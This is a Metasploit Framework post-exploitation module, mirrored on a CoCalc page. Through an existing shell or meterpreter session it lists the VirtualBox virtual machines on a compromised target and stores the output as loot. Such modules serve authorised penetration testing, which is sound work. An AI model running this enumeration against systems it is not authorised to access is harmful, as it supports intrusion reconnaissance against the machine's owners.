CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/multi/gather/enum_vbox.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'yaml'

7


8
class MetasploitModule < Msf::Post

9
  include Msf::Post::File

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Multi Gather VirtualBox VM Enumeration',

16
        'Description' => %q{

17
          This module will attempt to enumerate any VirtualBox VMs on the target machine.

18
          Due to the nature of VirtualBox, this module can only enumerate VMs registered

19
          for the current user, therefore, this module needs to be invoked from a user context.

20
        },

21
        'License' => MSF_LICENSE,

22
        'Author' => ['theLightCosine'],

23
        'Platform' => %w[bsd linux osx unix win],

24
        'SessionTypes' => ['shell', 'meterpreter' ]

25
      )

26
    )

27
  end

28


29
  def run

30
    case session.platform

31
    when 'windows'

32
      if session.type == 'meterpreter'

33
        begin

34
          res = cmd_exec('c:\\Program Files\\Oracle\\VirtualBox\\vboxmanage', 'list -l vms')

35
        rescue ::Rex::Post::Meterpreter::RequestError

36
          print_error('VirtualBox does not appear to be installed on this machine')

37
          return nil

38
        end

39


40
        if res.empty?

41
          print_status('VirtualBox is installed but this user has no VMs registered. Try another user.')

42
          return nil

43
        end

44
      else

45
        res = cmd_exec('"c:\\Program Files\\Oracle\\VirtualBox\\vboxmanage" list -l vms')

46
        if res.empty?

47
          print_error('VirtualBox isn\'t installed or this user has no VMs registered')

48
          return nil

49
        end

50
      end

51
    when 'unix', 'linux', 'bsd', 'osx'

52
      res = cmd_exec('vboxmanage list -l vms')

53


54
      unless res.start_with?('Sun VirtualBox') || res.include?('Name:')

55
        print_error('VirtualBox isn\'t installed or this user has no VMs registered')

56
        return nil

57
      end

58
    end

59


60
    return nil unless res

61


62
    vprint_status(res)

63
    store_path = store_loot('virtualbox_vms', 'text/plain', session, res, 'virtualbox_vms.txt', 'Virtualbox Virtual Machines')

64
    print_good("#{peer} - File successfully retrieved and saved on #{store_path}")

65
  end

66


67
end

68


69